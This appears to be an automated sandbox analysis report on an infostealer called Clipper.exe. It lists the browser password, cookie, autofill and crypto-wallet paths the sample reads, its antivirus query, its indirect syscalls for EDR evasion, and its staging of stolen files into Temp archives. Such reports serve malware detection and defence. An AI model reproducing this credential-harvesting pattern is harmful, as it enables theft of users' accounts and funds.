Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Jump to behavior
Source: Web Data.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Web Data.0.drBinary or memory string: discord.comVMware20,11696428655f
Source: Web Data.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Web Data.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Web Data.0.drBinary or memory string: global block list test formVMware20,11696428655
Source: Web Data.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Web Data.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Web Data.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Web Data.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Web Data.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Web Data.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Web Data.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Web Data.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Web Data.0.drBinary or memory string: outlook.office365.comVMware20,11696428655t
Source: Web Data.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Web Data.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Web Data.0.drBinary or memory string: outlook.office.comVMware20,11696428655s
Source: Web Data.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Web Data.0.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Web Data.0.drBinary or memory string: AMC password management pageVMware20,11696428655
Source: Web Data.0.drBinary or memory string: tasks.office.comVMware20,11696428655o
Source: Web Data.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Web Data.0.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Web Data.0.drBinary or memory string: interactivebrokers.comVMware20,11696428655
Source: Web Data.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Web Data.0.drBinary or memory string: dev.azure.comVMware20,11696428655j
Source: Web Data.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Web Data.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Web Data.0.drBinary or memory string: bankofamerica.comVMware20,11696428655x
Source: Web Data.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Web Data.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Desktop\Clipper.exeNtReadFile: Indirect: 0x7FF6C66D52C7Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeNtWriteFile: Indirect: 0x7FF6C66CDB77Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"Jump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\CEF\User Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\Clipper.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\CZQKSDDMWR.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\CZQKSDDMWR.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.pdf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.pdf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\GIGIYTFFYT.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\GIGIYTFFYT.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\GIGIYTFFYT.pdf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\GIGIYTFFYT.pdf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\JDDHMPCDUJ.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\JDDHMPCDUJ.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\LIJDSFKJZG.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.pdf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.pdf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\QCOILOQIKC.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\QCOILOQIKC.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.pdf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.pdf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Desktop\ZIPXYXWIOY.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\EFOYFBOLXA.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\EFOYFBOLXA.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\EIVQSAOTAQ.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\EIVQSAOTAQ.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\GIGIYTFFYT.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\GIGIYTFFYT.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\GIGIYTFFYT.pdf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\GIGIYTFFYT.pdf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\GRXZDKKVDB.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\GRXZDKKVDB.docx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\GRXZDKKVDB.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\GRXZDKKVDB.jpg VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\NVWZAPQSQL.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\Documents\NVWZAPQSQL.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Autofill VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Cookies VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\CreditCards VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Downloads VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\History VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Passwords VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\screen1.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\screen1.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\sensitive-files.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\sensitive-files.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\user_info.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Passwords\Edge_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\History\Chrome_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\History\Edge_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\History\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Downloads\Edge_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Downloads\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Cookies\Chrome_Default_Network.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Cookies\Edge_Default_Network.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Autofill\Chrome_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Autofill\Edge_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\YECZngKW2OPKnshx43Z8Dt4z2ocuqM\Autofill\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeQueries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Clipper.exe, 00000000.00000003.2050546232.000001A2EBEF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Electrum\wallets\
Source: Clipper.exe, 00000000.00000003.2050546232.000001A2EBEF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Electrum\wallets\
Source: Clipper.exe, 00000000.00000003.2050546232.000001A2EBEF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\exodus\exodus.wallet\
Source: Clipper.exe, 00000000.00000003.2051601001.000001A2EBEF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: Clipper.exe, 00000000.00000003.2050546232.000001A2EBEF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\exodus\exodus.wallet\
Source: Clipper.exe, 00000000.00000003.2051601001.000001A2EBEF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: Clipper.exe, 00000000.00000003.2050546232.000001A2EBEF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\exodus\exodus.wallet\
Source: Clipper.exe, 00000000.00000003.2051601001.000001A2EBEF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliobJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Login DataJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
Source: C:\Users\user\Desktop\Clipper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
